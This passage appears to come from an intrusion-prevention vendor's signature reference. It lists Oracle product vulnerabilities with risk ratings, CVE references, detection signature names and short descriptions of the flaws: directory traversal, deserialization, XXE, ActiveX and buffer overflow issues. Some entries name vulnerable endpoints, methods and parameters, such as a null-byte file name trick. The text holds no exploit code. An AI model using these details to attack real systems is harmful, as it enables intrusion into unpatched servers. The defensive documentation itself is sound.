References:
CVE-2016-0476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0476
Back to top

Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: The Oracle Application Testing Suite insufficiently validates the data sent to URI "/olt/UploadFileUpload.do". A crafted request sent to the server can be used to gain remote code execution on the server. This vulnerability requires prior authentication, which can be bypassed with other attacks.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-Uploadfileaction-Filetype-Directory-Traversal
References:
CVE-2016-0491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0491
Back to top

Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: High
First detected in: sgpkg-ips-727-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: There exists a directory path traversal vulnerability in the Oracle Application Testing Suite. A remote attacker can use this to acchieve code execution on the affected system.
Situation: HTTP_CSH-Oracle-Application-Testing-Suite-Uploadservlet-Filename-Directory-Traversal
References:
CVE-2016-0490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0490
Back to top

Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: High
First detected in: sgpkg-ips-742-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Oracle's Application Testing Suite. A remote attacker can use this to download arbitrary files from the target server.
Situation: HTTP_CRL-Oracle-ATS-Downloadservlet-Exportfilename-Directory-Traversal
References:
CVE-2016-0486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0486
Back to top

Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: A directory traversal vulnerability resulting from improper input validation in the HTTP request parser of the Oracle ATS may allow an unauthenticated attacker to download arbitrary files.
Situation: HTTP_CRL-Oracle-ATS-Downloadservlet-Tmapreportimage-Directory-Traversal
References:
CVE-2016-0480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0480
Back to top

Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle AutoVue
Risk: High
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle AutoVue
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Oracle AutoVue. The vulnerability is due to an unbounded copy from a heap buffer to a stack buffer when processing SetMarkupMode function. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.
Situation: File-Text_Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow
References:
CVE-2012-0549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0549
BID-53077
http://www.securityfocus.com/bid/53077
OSVDB-81439
http://www.osvdb.org/81439
Back to top

Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation

About this vulnerability: A vulnerability in Oracle AutoVue
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle AutoVue
Type: Input Validation
Description: An insecure method is exposed by Oracle AutoVue. The vulnerability is due to the AUTOVUEX.AutoVueXCtrl (AutoVueX.ocx) ActiveX control including the insecure "Export3DBom()" method. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation
References:
BID-50333
http://www.securityfocus.com/bid/50333
Back to top

Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation

About this vulnerability: A vulnerability in Oracle AutoVue
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle AutoVue
Type: Input Validation
Description: An insecure method is exposed by Oracle AutoVue. The vulnerability is due to the AUTOVUEX.AutoVueXCtrl (AutoVueX.ocx) ActiveX control including the insecure "ExportEdaBom()" method. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation
Back to top

Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation

About this vulnerability: A vulnerability in Oracle AutoVue
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle AutoVue
Type: Malfunction
Description: An insecure method is exposed by Oracle AutoVue. The vulnerability exists in Oracle's AutoVue ActiveX control and is due to insufficient input validation of the parameter of "SaveViewStateToFile()" method. This can be exploited to rewrite arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation
References:
BID-50321
http://www.securityfocus.com/bid/50321
Back to top

Oracle-Bea-WebLogic-10-XSS

About this vulnerability: Oracle Bea WebLgic Server Cross-Site Scripting vulnerability
Risk: Moderate
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle BEA WebLogic
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Oracle Bea Weblogic Server. This allows a remote user to inject malicious scripts into the the server.
Situation: HTTP_CSU-Bea-WebLogic-XSS
Generic_Oracle-Bea-WebLogic-XSS
References:
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Bea-WebLogic-DOS

About this vulnerability: Buffer overflow in Oracle BEA Weblogic leads to Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle BEA WebLogic
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in BEA WebLogic Server Apache Connector. The vulnerability is due to a boundary error in the Apache connector. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target host. Successful exploitation would be a denial of service condition of Apache HTTP services on the target host. In an attack case, the affected server will terminate and all established connections will also be terminated.
Situation: HTTP_CRL-Oracle-Bea-WebLogic-Server-Apache-Connector-DoS
References:
CVE-2008-5457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5457
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Bea-WebLogic-Server-Apache-Connector-HTTP-Version-String-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in BEA WebLogic Server
Risk: High
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle BEA WebLogic
Type: Buffer Overflow
Description: There is a string buffer overflow vulnerability in Oracle BEA WebLogic Server. There is a boundary checking error in the Apache Connector component that can be exploited by a remote unauthenticated attacker by sending crafted requests to the target host. Successful exploitation allows the attacker to execute arbitrary code on the vulnerable system with the privileges of the running process, typically System.
Situation: HTTP_CSU-Oracle-Bea-WebLogic-URL-String-BOF
HTTP_CS-Excessively-Long-Request-Version-Field
References:
CVE-2008-3257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257
BID-30273
http://www.securityfocus.com/bid/30273
Back to top

Oracle-Bea-WebLogic-Server-Console-help.portal-XSS

About this vulnerability: A vulnerability in BEA Systems WebLogic Server
Risk: Moderate
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Oracle BEA WebLogic
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in BEA Weblogic Server. The vulnerability is due to an input validation error in certain pages that allows attackers to inject arbitrary HTML and JavaScript code that is executed in a user's web browser. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary HTML or script code on the client system. Successful exploitation results in the compromise of the target user's cookies (including authentication cookies) associated with the site, and modification of user information.
Situation: HTTP_CSU-Oracle-Bea-WebLogic-Server-Console-help.portal-XSS
References:
CVE-2009-1975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1975
BID-35673
http://www.securityfocus.com/bid/35673
Back to top

Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle BEA WebLogic Server
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle BEA WebLogic Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in BEA WebLogic Server Plugins.
Situation: HTTPS_CS-Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow
References:
CVE-2009-1016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1016
BID-34461
http://www.securityfocus.com/bid/34461
Back to top

Oracle-BeeHive-Voice-Servlet

About this vulnerability: An Oracle BeeHive Voice-Servlet vulnerability
Risk: High
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle BeeHive
Type: Code Injection
Description: A vulnerability in the voice-servlet component of Oracle BeeHive, versions 2.0.1.0, 2.0.1.1, 2.0.1.2, 2.0.1.2.1, and 2.0.1.3, which allows remote attackers to create a file with an executable extension and execute arbitrary code by includeing a %00 null byte in the file name parameter.
Situation: HTTP_CSU-Oracle-BeeHive-Voice-Servlet
References:
CVE-2010-4417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4417
Back to top

Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure

About this vulnerability: A vulnerability in Oracle BPEL Process Manager
Risk: Moderate
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle BPEL Process Manager
Type: Directory Traversal
Description: There is an information disclosure vulnerability in Oracle BPEL Process Manager. The vulnerability is due to insufficient input validation in ScriptServlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to obtain sensitive information of a target system.
Situation: HTTP_CSU-Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure
References:
CVE-2013-3828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3828
OSVDB-98462
http://www.osvdb.org/98462
Back to top

Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle Business Intelligence Enterprise Edition
Risk: Moderate
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: Insufficient validation of data received from the network causes an insecure deserialization vulnerability in Oracle Business Intelligence. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.
Situation: File-Binary_Oracle-BI-Biremotingservlet-Amf-Insecure-Deserialization
References:
CVE-2020-2950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2950
Back to top

Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle Business Intelligence Enterprise Edition
Risk: High
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: An XML external entity injection vulnerability exists in Oracle Business Intelligence Publisher Enterprise. The vulnerability is due to insufficient handling of XML external entities in the XDO service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could lead to the disclosure of file contents for any file readable by the target service.
Situation: File-TextId_Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection
References:
CVE-2021-2401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2401
Back to top

Oracle-Business-Intelligence-CVE-2021-2456-Insecure-Deserialization

About this vulnerability: An attempt to exploit a vulnerability in Oracle Business Intelligence BIRemotingServlet AMF detected
Risk: High
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: An attempt to exploit a vulnerability in Oracle Business Intelligence BIRemotingServlet AMF detected.
Situation: HTTP_CRL-Oracle-Business-Intelligence-Biremotingservlet-Amf-Insecure-Deserialization
References:
CVE-2021-2456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2456
Back to top

Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting

About this vulnerability: A vulnerability in Oracle Business Intelligence Enterprise Edition
Risk: Moderate
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in Oracle Business Intelligence. The vulnerability is due to improper input sanitization while constructing an error message for sub-resources to /em/console/help/webapp/ An attacker could exploit this vulnerability by enticing a target using specific web browsers to follow a crafted link. Successful exploitation could result in arbitrary script code execution in the context of the Business Intelligence application.
Situation: HTTP_CSU-Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting
References:
CVE-2012-1686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1686
BID-56026
http://www.securityfocus.com/bid/56026
OSVDB-86373
http://www.osvdb.org/86373
Back to top

Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864

About this vulnerability: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition
Risk: High
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Directory Traversal
Description: A vulnerability in Oracle Business Intelligence Enterprise Edition may allow unauthenticated attackers to read arbitrary files.
Situation: HTTP_CRL_Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864
References:
CVE-2020-14864
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14864
Back to top

Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616

About this vulnerability: A vulnerability in Oracle Business Intelligence
Risk: High
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1668-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: An external entity injection vulnerability has been reported in the ReportTemplateService component of the Oracle BI Publisher (previously XML Publisher).
Situation: File-Text_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
File-TextId_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
References:
CVE-2019-2616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2616
Back to top

Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure

About this vulnerability: A vulnerability in Oracle Business Intelligence Mobile App Designer
Risk: High
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Business Intelligence Mobile App Designer
Type: Directory Traversal
Description: An information disclosure vulnerability exists in Oracle Business Intelligence Mobile App Designer. The vulnerability is due to insufficient input validation of certain parameters, which can allow an attacker to traverse the file system and access files. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable application. Successful exploitation could result in the disclosure of arbitrary files.
Situation: HTTP_CSU-Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure
References:
CVE-2014-4249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4249
BID-68605
http://www.securityfocus.com/bid/68605
OSVDB-109086
http://www.osvdb.org/109086
Back to top

Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection

About this vulnerability: A vulnerability in Oracle Business Intelligence Enterprise Edition
Risk: Moderate
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1388-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: A JNDI injection vulnerability exists in Oracle Business Intelligence Publisher. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Oracle-Business-Intelligence-Publisher-Schedulerconfigpage11g-JNDI-Injection
References:
CVE-2021-2391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2391
Back to top

Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection

About this vulnerability: A vulnerability in Oracle Business Intelligence Enterprise Edition
Risk: Moderate
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: Improper handling of requests causes a JNDI vulnerability in Oracle Business Intelligence Enterprise Edition. A successful exploit may allow an attacker to send arbitrary serialized objects to the target system to be executed.
Situation: HTTP_CRL-Oracle-Business-Intelligence-Publisher-Updateconnectionservlet-JNDI-Injection
References:
CVE-2021-2396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2396
Back to top

Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection

About this vulnerability: A vulnerability in Oracle Business Intelligence Enterprise Edition.
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1448-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: A vulnerability in Oracle Business Intelligence Enterprise Edition, versions 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0, and 5.5.0.0.0, which allows remote attackers to disclose file contents by sending crafted requests to the target server, due to the insufficient handling of XML external entities in the XDO service.
Situation: Generic_TCP-Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
File-TextId_Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
References:
CVE-2021-2400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2400
Back to top

Oracle-Business-Intelligence-SQL-Injection

About this vulnerability: Attempt to explot a vulnerability in Oracle Business Intelligence One
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Business Intelligence One
Type: SQL Injection
Description: Oracle Business Intelligence contains an SQL injection vulnerability. The vulnerability is due to improper input validation in the OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID procedure.
Situation: TNS_Oracle-Oracle-Business-Intelligence-SQL-Injection
References:
CVE-2011-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0799
BID-47431
http://www.securityfocus.com/bid/47431
OSVDB-71956
http://www.osvdb.org/71956
Back to top

Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Oracle Business Intelligence Enterprise Edition
Risk: Moderate
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: Oracle Business Intelligence Enterprise Edition
Type: Input Validation
Description: Improper input validation in the UploadFndDBCPage class causes a file upload vulnerability in Oracle Business Intelligence. A successful exploit allows an attacker to cause a denial of service condition or privilege escalation.
Situation: HTTP_CS-Oracle-Business-Intelligence-Uploadfnddbcpage-Arbitrary-File-Upload
References:
CVE-2021-2392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2392
Back to top

Oracle-Business-Transaction-Management-Arbitrary-File-Creation

About this vulnerability: A vulnerability in Oracle Business Transaction Management
Risk: High
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Business Transaction Management
Type: Directory Traversal
Description: There is a directory traversal vulnerability in Oracle Business Transaction Management Server. The vulnerability is due to insufficient validation of user input while processing SOAP requests sent to the FlashTunnelService web service. By specifying a writeToFile operation, remote, unauthenticated attackers can create arbitrary files on the server and execute arbitrary code from the uploaded file.
Situation: HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Creation
Back to top

Oracle-Business-Transaction-Management-Flashtunnel-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Oracle Business Transaction Management
Risk: Moderate
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Business Transaction Management
Type: Directory Traversal
Description: There is a directory traversal vulnerability in Oracle Business Transaction Management Server. The vulnerability is due to insufficient validation of user input while processing SOAP requests sent to the FlashTunnelService web service. By specifying a deleteFile operation, remote, unauthenticated attackers can remove arbitrary files on the server with System privileges. This can lead to a denial of service condition or can be used to assist further attacks.
Situation: HTTP_CS-Oracle-Business-Transaction-Management-Arbitrary-File-Deletion
References:
BID-54870
http://www.securityfocus.com/bid/54870
Back to top

Oracle-Client-System-Analyzer-Arbitrary-File-Upload

About this vulnerability: An Oracle Client System Analyzer Arbitrary File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database Server
Type: Input Validation
Description: A vulnerability in Oracle Database Client System Analyzer, versions 11.1.0.7 and 11.2.0.1, which allows remote attackers to upload arbitrary files by sending a NULL byte within a POST parameter during a request to this JSP script.
Situation: HTTP_CRL-Oracle-Client-System-Analyzer-Arbitrary-File-Upload
References:
CVE-2010-3600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3600
BID-45883
http://www.securityfocus.com/bid/45883
OSVDB-70546
http://www.osvdb.org/70546
Back to top

Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle Coherence
Risk: High
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Oracle Coherence; Oracle WebLogic Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Oracle Coherence. This vulnerability is due to a lack of deserialization filtering when Coherence ExternalizableLite classes are deserialized. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted T3 or IIOP request to a WebLogic server running a vulnerable version of Coherence. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.
Situation: Generic_CS-Oracle-Coherence-CVE-2020-14756-Insecure-Deserialization
References:
CVE-2020-14756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14756
Back to top

Oracle-Create-Database-Link-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database Server
Type: Buffer Overflow
Description: There is a vulnerability in Oracle database products. A specially crafted Connect String parameter, specified in the Create Database Link command, could trigger buffer overflow in the database server process. A remote attacker can use this vulnerability to create a denial-of-service condition affecting the entire database. Note that an attacker must be able to login as a user with certain privileges to trigger this vulnerability. In a simple attack case, the vulnerable service drops all active connections. The service continues to accept connections to the Oracle server. However, because of memory corruption, user authentication always fails, even with valid user credentials. Therefore, a denial of service condition exists until the service is restarted. In a more sophisticated attack case, this vulnerability may be exploited for code execution. In this case, the behaviour of the attack target is dependent on the code injected. On Unix-like systems, the service runs as the 'oracle' user which does not have full system privileges. On Windows, the service runs as local system which does have full system privileges. Therefore, the privilege level that injected code is executed with is dependent on the operating system that the vulnerable Oracle server is running on.
Situation: Generic_CS-Oracle-Create-Database-Link-Buffer-Overflow
TNS_CS-Oracle-Create-Database-Link-Buffer-Overflow
Back to top

Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference

About this vulnerability: A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator
Risk: Moderate
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Data Profiling and Data Quality for Data Integrator
Type: Input Validation
Description: A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.DscForms.DateTimeWrapper ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.
Situation: File-Text_Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference
References:
CVE-2014-2416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2416
OSVDB-105819
http://www.osvdb.org/105819
Back to top

Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference

About this vulnerability: A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator
Risk: High
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Data Profiling and Data Quality for Data Integrator
Type: Input Validation
Description: A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.DscXB.XB ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.
Situation: File-Text_Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference
References:
CVE-2014-2417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2417
OSVDB-105820
http://www.osvdb.org/105820
Back to top

Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Deref

About this vulnerability: A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Data Profiling and Data Quality for Data Integrator
Type: Input Validation
Description: A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.DscTools.FileChooserDlg ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.
Situation: File-Text_Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Dereference
References:
CVE-2014-2418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2418
OSVDB-105822
http://www.osvdb.org/105822
Back to top

Oracle-Data-Quality-Loaderwizard-Datapreview-Type-Confusion

About this vulnerability: A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator
Risk: Moderate
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Data Profiling and Data Quality for Data Integrator
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Oracle Data Quality LoaderWizard DataPreview method contained in the TSS12.LoaderWizard.lwctrl ActiveX control. The vulnerability is due to type confusion when handling data passed to it. A remote attacker can exploit this vulnerability by enticing a user to access a maliciously crafted webpage. This can lead to arbitrary code execution in the context of the affected user.
Situation: File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities
Back to top

Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference

About this vulnerability: A vulnerability in Oracle Data Profiling and Data Quality for Data Integrator
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Data Profiling and Data Quality for Data Integrator
Type: Input Validation
Description: A remote code execution vulnerability exists in Oracle Data Profiling and Data Quality for Data Integrator. The vulnerability is due to dereferencing an arbitrary pointer within the TSS12.TransformerTools.PostcardPreviewInt ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.
Situation: File-Text_Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference
References:
CVE-2014-2415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2415
OSVDB-105821
http://www.osvdb.org/105821
Back to top

Oracle-Data-Quality-Trillium-Based-Setbasicpreviewdata-Type-Confusion

About this vulnerability: A vulnerability in Oracle Oracle Data Profiling and Data Quality for Data Integrator
Risk: Moderate
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Data Profiling and Data Quality for Data Integrator
Type: Input Validation
Description: A remote code execution vulnerability exists in Oracle Data Quality TSS12.LoaderWizard.lwctrl ActiveX control. The vulnerability is due to a type confusion when handling data passed to SetBasicPreviewData(). A remote attacker can exploit this vulnerability by enticing a user to access a maliciously crafted webpage. This can lead to arbitrary code execution in the context of the affected user.
Situation: File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities
References:
CVE-2015-4759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4759
Back to top

Oracle-Data-Quality-Trillium-Based-Setentities-Type-Confusion

About this vulnerability: A vulnerability in Oracle Oracle Data Profiling and Data Quality for Data Integrator
Risk: Moderate
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Data Profiling and Data Quality for Data Integrator
Type: Input Validation
Description: A remote code execution vulnerability exists in Oracle Data Quality TSS12.LoaderWizard.lwctrl ActiveX control. The vulnerability is due to a type confusion when handling data passed to SetEntities(). A remote attacker can exploit this vulnerability by enticing a user to access a maliciously crafted webpage. This can lead to arbitrary code execution in the context of the affected user.
Situation: File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities
References:
CVE-2015-0444
